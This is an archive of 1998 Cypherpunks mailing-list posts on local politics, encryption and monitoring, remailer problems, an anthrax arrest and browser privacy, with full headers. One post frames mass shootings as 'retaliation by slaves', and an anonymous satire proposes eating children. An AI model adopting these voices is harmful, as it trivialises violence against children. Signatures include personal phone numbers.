>hearings on these matters.  Unless the local media jumps on one of these
>proposals weeks in advance, nobody will even know about it or have an
>opportunity to petition for a public hearing.  Once the county
>commisioners vote on and approve it, our money is spent and the public has
>no recourse (until the next election).  Here in Raleigh, Wake County, NC,
>for instance, we have a Republican county commissioner and a board of
>members.  When I heard from his daughter, a personal friend, about his
>plans to cut funding to drug education and rehab programs and redirect all
>of those funds to the county prison system, I decided to act.  I contacted
>the commissioner himself, his office, and even had lunch with his wife and
>daughter to discuss this issue.  As a family friend, I thought I would at
>least be able to get a friendly, receptive ear.  His wife and daughter
>were in full agreement with me, but the commissioner dismissed all of my
>suggestions and pleas.  In fact, he told me that I was "high on crack" for
>even suggesting that he *not* cut spending to drug education and rehab
>programs.  i then appealed to the media, the public, and various county
>drug rehab and education facilities and tried to petition for public
>hearings on the issue.  After getting stonewalled by the GOP-controlled
>county board of commissioners, funding to drug rehab and education
>programs was cut by over 50%.  Since that time (two years ago), drug
>arrests and convictions, violent crime, murder, non-violent crimes,
>and admissions to treatment centers have all risen, in all of the basic
>statistical measurement categories.
>
>Wake county taxes have increased dramatically (almost 50%), and we have
>just completed building a new county jail and several county jail annex
>facilities.  In both percentage and numbers, our county jail population is
>at the highest rate it has ever been.
>
>On a related note, seven of the Wake county sherriff's deputies, who all
>had laptop computers (with Internet access) in their cruisers, were
>recently busted for spending all of their time on the clock surfing the
>web and going to porno websites and adult chatrooms.  One of the deputies
>has been arrested for using a sherriff's department scanner to scan in a
>picture of his genitals which he then sent to a young girl, a minor, from
>his cruiser while on duty.
>
>Additionally, the officer in charge of the weapons armory for the
>sherriff's department, which contains full-auto weapons such as the HK MP5
>and the M16, was recently dismissed because it was discovered that he had
>been spending all of his time on the clock in another section of the
>building surfing adult sites on the web.  Meanwhile, the armory was left
>unlocked, deputies were unable to get their weapons serviced within a
>reasonable period of time, and an M16 "disappeared".
>
>My tax dollars at work...

May I suggest trying what we did here in Colorado.  Take a look at our
Taxpayers Bill of Rights.  No government in Colorado (state, county or
local) can raise taxes without putting the measure before the public
for a vote.  We have, for the time being, tied the hands of the
government.  They can't just spend money and expect to raise taxes to
cover the short fall.

It took 5 state wide elections to amend the constitution, but the
public finely wised up.  Each election, the State would promise to
change their spending habits.  They broke that promise every time,
once within days of the election.

We have also, on a few occasions, amended our state constitution to
force the government to fund specific items (Education for one) before
any other items may be funded.

If your North Carolina allows the public to patition to have a measure
put before the public in an election, try doing it.  It's not perfect,
but it might send a clear message to the government.

-Doug

p.s.
  Please forgive the grammar errors.  I suffer from using a Microsoft
spelling checker that likes to change the meaning of my words.
-------------------
Douglas L. Peterson
mailto:fnorky@geocities.com
http://www.geocities.com/SiliconValley/Heights/1271/


From owner-cypherpunks@Algebra.COM Sun Feb 22 03:14 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20079 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 03:14:12 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id OAA25694
	for cypherpunks-outgoing; Sat, 21 Feb 1998 14:07:35 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id OAA25677
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 14:07:25 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id LAA21518; Sat, 21 Feb 1998 11:09:36 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id LAA21513 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 11:09:30 -0800 (PST)
Received: from toad.com (toad.com [140.174.2.1]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id LAA12140 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 11:04:13 -0800 (PST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id LAA09134 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 11:06:39 -0800 (PST)
Received: from dfw-ix11.ix.netcom.com (dfw-ix11.ix.netcom.com [206.214.98.11]) by toad.com (8.7.5/8.7.3) with ESMTP id LAA09127 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 11:06:36 -0800 (PST)
Received: (from smap@localhost)
          by dfw-ix11.ix.netcom.com (8.8.4/8.8.4)
	  id NAA23008; Sat, 21 Feb 1998 13:02:27 -0600 (CST)
Received: from den-co6-26.ix.netcom.com(199.35.204.218) by dfw-ix11.ix.netcom.com via smap (V1.3)
	id rma022961; Sat Feb 21 13:02:06 1998
From: fnorky@geocities.com (Douglas L. Peterson)
To: ulf@fitug.de (=?ISO-8859-1?Q?Ulf_M=F6ller?=)
Cc: cypherpunks@toad.com
Subject: Re: "carefully monitor the Internet"
Date: Sat, 21 Feb 1998 19:02:23 GMT
Message-ID: <34f223bb.132126550@smtp.ix.netcom.com>
References: <m0y5wOj-0003bcC@ulf.mali.sub.org>
In-Reply-To: <m0y5wOj-0003bcC@ulf.mali.sub.org>
X-Mailer: Forte Agent 1.5/32.452
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by www.video-collage.com id OAA25678
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=us-ascii
Content-Length: 801


On Fri, 20 Feb 1998 18:38:04 +0100 (GMT+0100), you wrote:

>
>   To keep pace with the fast-moving money launders, FAFT said it would
>   carefully monitor the Internet and so-called electronic purse systems,
>   whereby cash is passed from person to person via electronic chips,
>   leaving no audit trail in its wake.
>
>http://www.yahoo.com/headlines/980212/wired/stories/money_2.html
>http://www.oecd.org/fatf/

Hmm, lets see.  I login using secure shell.  Now I start a SSL session
to someplace where I want to exchange money.  Next I use e-cash.  The
monitor will see encrypted garbage.

Quick, kick in the door.  He is using encryption!  Must be money
launders!

-Doug


-------------------
Douglas L. Peterson
mailto:fnorky@geocities.com
http://www.geocities.com/SiliconValley/Heights/1271/


From owner-cypherpunks@Algebra.COM Sun Feb 22 09:34 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20682 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 09:34:34 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id UAA28863
	for cypherpunks-outgoing; Sat, 21 Feb 1998 20:26:53 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id UAA28845
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 20:26:46 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id RAA20646; Sat, 21 Feb 1998 17:28:59 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id RAA20637 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 17:28:49 -0800 (PST)
Received: from wire.insync.net (emc@wire.insync.net [204.253.208.247]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id RAA28386 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 17:23:32 -0800 (PST)
Received: (from emc@localhost) by wire.insync.net (8.8.7/8.8.3) id TAA04522; Sat, 21 Feb 1998 19:28:44 -0600
From: Eric Cordian <emc@wire.insync.net>
Message-Id: <199802220128.TAA04522@wire.insync.net>
Subject: Re: Pensacola Police have lost their mind!! (fwd)
To: cypherpunks@cyberpass.net
Date: Sat, 21 Feb 1998 19:28:44 -0600 (CST)
In-Reply-To: <413AC08141DBD011A58000A0C924A6D50D7DA6@MVS2> from "Ernest Hua" at Feb 21, 98 01:43:33 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=US-ASCII
Content-Length: 1342


Ern writes:

> Those of you who are parents of toddlers and have watched in horror as
> other parents seem to have zero control over their children, would
> understand why the school reacted this way.  Getting the police involved
> may not necessarily be the "right" thing to do, but there is a LOT of
> pressure on public schools to be passive or suffer the wrath of
> child-abuse lawsuits. 

Florida is a corporal punishment state where teachers may slap, hit, beat,
paddle, manhandle, and otherwise bully students in their charge, without
parental permission, and "educators" are protected by laws which make even
laying a finger on them a crime comparable with beating an elected
official to a blody pulp. 

So one Florida five year old gets bent out of shape and tries to tear a
school employee to shreds? 

Unremarkable. 

If five year olds in places like Vermont and Connecticut, where teachers
are actually restrained by laws which limit their behavior, begin to do
similar things, then I will begin to take notice. 

However incidents like this, and even mass shootings in places like Texas,
simply show that the press gives more attention to retaliation by slaves,
than it does to atrocities by slave owners.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"


From owner-cypherpunks@Algebra.COM Sun Feb 22 03:12 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20064 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 03:12:20 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id OAA25482
	for cypherpunks-outgoing; Sat, 21 Feb 1998 14:01:15 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id OAA25460
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 14:01:09 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id LAA21113; Sat, 21 Feb 1998 11:03:15 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id LAA21100 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 11:03:07 -0800 (PST)
Received: from basement.replay.com (basement.replay.com [194.109.9.44]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id KAA11830 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 10:57:49 -0800 (PST)
Received: (from replay@localhost)
	by basement.replay.com (8.8.5/RePlay, Inc.) id UAA10144
	for cypherpunks@cyberpass.net; Sat, 21 Feb 1998 20:03:00 +0100 (MET)
Date: Sat, 21 Feb 1998 20:03:00 +0100 (MET)
Message-Id: <199802211903.UAA10144@basement.replay.com>
Subject: Re: Some children are rabid and need to be put down
To: cypherpunks@cyberpass.net
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay Associates, L.L.P.
X-001: Replay may or may not approve of the content of this posting
X-002: Report misuse of this automated service to <abuse@replay.com>
X-URL: http://www.replay.com/remailer/
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 1453


Tim May is spot on about the feral kid. Yet, battering the 
clone bruises the produce and harms sales.

Kids are over-coddled species and that's the cause of the 
rise in black market of kiddie porn, kidnapping, rape, incest 
and murder, what with crazed adults (parents and wannabes) 
wanting to develop for home domination hyper-valued Benets, 
since they're worth more on the market as icons than as 
needy brats begging for affection and attention, and interfering 
with dad and mom getting on with maximum self-indulgence.

And there's way too many kids, anyhow, the market's saturated. 
Especially those over the age of adorable cuddling and grandma 
gaga for adverts. Harvest all over the age of two, say, when they 
become unruly, as the Brit pedophagist proposed for the Irish 
surplus to solve the famine. Shut the day cares, schools, colleges,
boot camps for homicidals. Unplug the Net for those under 30,
they're more socially useful as protein, as anciently preached
by St. Peter's Eunuchs.

Eat the kids, doom the race. Evolution stops with the me-gen.

The technical solution to the after-me-nada agribusiness is set out in 
Tim's aggra-sig:

Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.


From owner-cypherpunks@Algebra.COM Sun Feb 22 10:55 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20807 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 10:55:33 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id VAA29578
	for cypherpunks-outgoing; Sat, 21 Feb 1998 21:47:53 -0500 (EST)
Received: from einstein.ssz.com (root@einstein.ssz.com [204.96.2.99])
	by www.video-collage.com (8.8.5/8.8.5) with SMTP id VAA29551
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 21:47:43 -0500 (EST)
Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id VAA31973 for cypherpunks@algebra.com; Sat, 21 Feb 1998 21:02:20 -0600
Received: (from bin@localhost) by einstein.ssz.com (8.6.12/8.6.9) id VAA31949 for cypherpunks-outgoing; Sat, 21 Feb 1998 21:02:08 -0600
Received: (from ravage@localhost) by einstein.ssz.com (8.6.12/8.6.9) id VAA31933; Sat, 21 Feb 1998 21:02:01 -0600
From: Jim Choate <ravage@ssz.com>
Message-Id: <199802220302.VAA31933@einstein.ssz.com>
Subject: Pseudorandomness and Cryptographic Applications [Book]
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Date: Sat, 21 Feb 1998 21:02:01 -0600 (CST)
Cc: austin-cpunks@ssz.com (Austin Cypherpunks)
X-Mailer: ELM [version 2.4 PL23]
X-Mailing-List: cypherpunks@ssz.com
X-List-Admin: list@ssz.com
X-Loop: ssz.com
X-Language: English, Russian, German
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 1642


Hi,

Pseudorandomness and Cryptographic Applications
Michael Luby
ISBN 0-691-02546-0
~$25 US

Discusses techniques to take one-way functions and produce pseudo-random
number generators. The second half of the book discusses various
applications of these algorithms.

private key cryptosystems
pseudorandom function generators
pseudorandom permutation generators
digital signature schemes
bit commitment protocols
zero-knowledge interactive proof systems


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|


From owner-cypherpunks@Algebra.COM Sun Feb 22 11:42 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20870 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 11:41:57 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id WAA29873
	for cypherpunks-outgoing; Sat, 21 Feb 1998 22:34:17 -0500 (EST)
Received: from ns.minder.net (cpunks@ns.minder.net [205.136.25.228])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id WAA29860
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 22:34:12 -0500 (EST)
Received: (from cpunks@localhost)
	by ns.minder.net (8.8.7/8.8.7) id WAA23085
	for cypherpunks@algebra.com; Sat, 21 Feb 1998 22:34:28 -0500
Received: from einstein.ssz.com (root@einstein.ssz.com [204.96.2.99])
	by ns.minder.net (8.8.7/8.8.7) with SMTP id WAA23079
	for <cpunks@minder.net>; Sat, 21 Feb 1998 22:34:24 -0500
Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id VAA32252 for cpunks@minder.net; Sat, 21 Feb 1998 21:48:43 -0600
Received: (from bin@localhost) by einstein.ssz.com (8.6.12/8.6.9) id VAA32244 for cypherpunks-outgoing; Sat, 21 Feb 1998 21:48:40 -0600
Received: (from ravage@localhost) by einstein.ssz.com (8.6.12/8.6.9) id VAA32237 for cypherpunks; Sat, 21 Feb 1998 21:48:36 -0600
From: Jim Choate <ravage@ssz.com>
Message-Id: <199802220348.VAA32237@einstein.ssz.com>
Subject: CDR Breakage?....
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Date: Sat, 21 Feb 1998 21:48:36 -0600 (CST)
X-Mailer: ELM [version 2.4 PL23]
X-Mailing-List: cypherpunks@ssz.com
X-List-Admin: list@ssz.com
X-Loop: ssz.com
X-Language: English, Russian, German
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 1610


Forwarded message:

> Date: 22 Feb 1998 03:31:35 -0000
> From: Secret Squirrel <anon@squirrel.owl.de>
> Subject: Vile Vial Files

> <There appears to be some major breakage in the remailer network somewhere.
> Hopefully it'll pass. Apologies if this hits the list more than once.>

I've seen something similar a couple of times now. What other kinds of
anomolies are you experiencing that indicate a breakdown in the CDR?


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|


From owner-cypherpunks@Algebra.COM Sun Feb 22 12:29 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20972 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 12:29:33 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id XAA00333
	for cypherpunks-outgoing; Sat, 21 Feb 1998 23:22:24 -0500 (EST)
Received: from einstein.ssz.com (root@einstein.ssz.com [204.96.2.99])
	by www.video-collage.com (8.8.5/8.8.5) with SMTP id XAA00319
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 23:22:12 -0500 (EST)
Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id WAA32722 for cypherpunks@algebra.com; Sat, 21 Feb 1998 22:36:49 -0600
Received: (from bin@localhost) by einstein.ssz.com (8.6.12/8.6.9) id WAA32707 for cypherpunks-outgoing; Sat, 21 Feb 1998 22:36:41 -0600
Received: (from ravage@localhost) by einstein.ssz.com (8.6.12/8.6.9) id WAA32688; Sat, 21 Feb 1998 22:36:32 -0600
From: Jim Choate <ravage@ssz.com>
Message-Id: <199802220436.WAA32688@einstein.ssz.com>
Subject: One Anthrax suspect released [CNN]
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Date: Sat, 21 Feb 1998 22:36:32 -0600 (CST)
Cc: austin-cpunks@ssz.com (Austin Cypherpunks),
        users@ssz.com (SSZ User Mail List), friends@ssz.com (Ravage's Friends)
X-Mailer: ELM [version 2.4 PL23]
X-Mailing-List: cypherpunks@ssz.com
X-List-Admin: list@ssz.com
X-Loop: ssz.com
X-Language: English, Russian, German
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 2219


Forwarded message:

>                ONE SUSPECT IN ANTHRAX CASE RELEASED FROM CUSTODY
>                                        
>      Leavitt Leavitt   February 21, 1998
>      Web posted at: 10:08 p.m. EST (0308 GMT)
>      
>      LAS VEGAS, Nev. (CNN) -- One of the two men arrested for posession
>      of what turned out to be non-lethal anthrax was released from
>      custody Saturday evening.
>      
>      William Leavitt Jr., 47, thanked God, his family, law enforcement
>      officials, a federal magistrate judge and his lawyers for getting
>      him out of prison on his own recognizance, saying the past three
>      days have been the "most difficult days of my life."
>      
>      Leavitt and Larry Wayne Harris, 46, were arrested Wednesday night
>      and charged with conspiracy to possess and possession of a
>      biological agent.
>      
>      Leavitt's release came just hours after FBI agents raided the
>      microbiologist's home north of Las Vegas in search of more evidence.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|


From owner-cypherpunks@Algebra.COM Sun Feb 22 14:52 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21179 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 14:52:04 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id BAA02220
	for cypherpunks-outgoing; Sun, 22 Feb 1998 01:43:21 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id BAA02208
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 01:43:17 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id WAA13433; Sat, 21 Feb 1998 22:45:33 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id WAA13429 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 22:45:28 -0800 (PST)
Received: from always.got.net (root@gotnet.znet.net [207.167.86.126]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id WAA11997 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 22:40:13 -0800 (PST)
Received: from [207.167.93.63] (tcmay.got.net [207.167.93.63])
	by always.got.net (8.8.8/8.8.7/Debian/GNU) with ESMTP id WAA28538
	for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 22:45:22 -0800
X-Sender: tcmay@mail.got.net
Message-Id: <v03102810b11578937515@[207.167.93.63]>
In-Reply-To: <19980222.040835.attila@hun.org>
References: <Pine.BSF.3.91.980221003100.613B-100000@mcfeely.bsfs.org>
Mime-Version: 1.0
Date: Sat, 21 Feb 1998 22:48:17 -0800
To: cypherpunks@cyberpass.net
From: Tim May <tcmay@got.net>
Subject: Re: Jimbelling the Sheep
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="us-ascii"
Content-Length: 1040


At 8:08 PM -0800 2/21/98, Attila T. Hun wrote:

>    sprynet: "the site has been taken down and there will be
>              no further information available."

Just like the Heaven's Gate site.

Interesting that the U.S.  Government uses a twice-convicted fraudster
selling a snake oil medical device as its confidential informant.

Here's to hoping Harris and Leavitt sue for false arrest. Last Olympics it
was Richard Jewell, this Olympics it's these guys.

But the corrections are being given less coverage than the original lurid,
headline news, so the Administration will have gotten what it wanted.

Disgraceful.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.




From owner-cypherpunks@Algebra.COM Sun Feb 22 12:14 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20920 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 12:14:19 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id XAA00141
	for cypherpunks-outgoing; Sat, 21 Feb 1998 23:04:56 -0500 (EST)
Received: from toad.com (toad.com [140.174.2.1])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id XAA00126
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 23:04:51 -0500 (EST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id TAA11296 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 19:56:40 -0800 (PST)
Received: from cc00ms.unity.ncsu.edu (cc00ms.unity.ncsu.edu [152.1.1.35]) by toad.com (8.7.5/8.7.3) with ESMTP id TAA11291 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 19:56:36 -0800 (PST)
Received: from c00069-100lez.eos.ncsu.edu (c00069-100lez.eos.ncsu.edu [152.1.26.28])
          by cc00ms.unity.ncsu.edu (8.8.4/US19Dec96) with SMTP
	  id WAA05752; Sat, 21 Feb 1998 22:56:33 -0500 (EST)
Date: Sat, 21 Feb 1998 22:56:32 -0500 (EST)
From: Ken Williams <jkwilli2@unity.ncsu.edu>
X-Sender: jkwilli2@c00069-100lez.eos.ncsu.edu
To: dstoler <dstoler@globalpac.com>
cc: cypherpunks@toad.com
Subject: Re: Request for Web Browser Information
In-Reply-To: <v03110701b1148b4c60aa@[207.215.173.72]>
Message-ID: <Pine.SOL.3.96.980221225230.22398G-100000@c00069-100lez.eos.ncsu.edu>
X-Copyright: The contents of this message may not be reproduced in any form
X-Copyright: (including Commercial use) unless specific permission is granted
X-Copyright: by the author of the message.  All requests must be in writing.
X-Disclaimer: The contents of this email are for educational purposes only
X-Disclaimer: and do not reflect the thoughts or opinions of either myself
X-Disclaimer: or my employer and are not endorsed by sponsored by or provided
X-Disclaimer: on behalf of North Carolina State University.
MIME-Version: 1.0
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Length: 1680


On Sat, 21 Feb 1998, dstoler wrote:

>I would like to know the information my browser makes available to web sites. I use both Netscape and Internet Explorer.
>
>Obviously web sites can determine my IP address for any given session; they can also look at cookies left by themselves and other sites.
>
>Can anyone point me to where I can learn exactly what other information is made available (browser version?, OS version?, system name?, user name?, etc.)?
>
>Thanks in advance.
>
>David
>
>
>

check these out...

Your Environmental Variables
http://152.7.11.38/~tattooman/variable.cgi

Your Privacy Online
http://www4.ncsu.edu/~jkwilli2/browserscript.html

So Much for your Privacy...
http://www4.ncsu.edu/~jkwilli2/main/NO_Privacy.html


if you want copies of any of these scripts and snippets, then feel free to
grab them off of my ftp server at
ftp://152.7.11.38/pub/personal/tattooman/
check in the "javascript", "java" and "code" subdirectories.

email me if you have any questions, comments, etc...

regards,

TATTOOMAN

/--------------------------[   TATTOOMAN   ]--------------------------\
| ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
| EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
| EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
| WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
| FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
| W3B: http://152.7.11.38/~tattooman/w3board/                         |
| PGP: finger tattooman@152.7.11.38                                   |
\----------------[   http://152.7.11.38/~tattooman/  ]----------------/



From owner-cypherpunks@Algebra.COM Sun Feb 22 15:18 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21230 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 15:17:57 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id CAA02555
	for cypherpunks-outgoing; Sun, 22 Feb 1998 02:09:17 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id CAA02543
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 02:09:06 -0500 (EST)
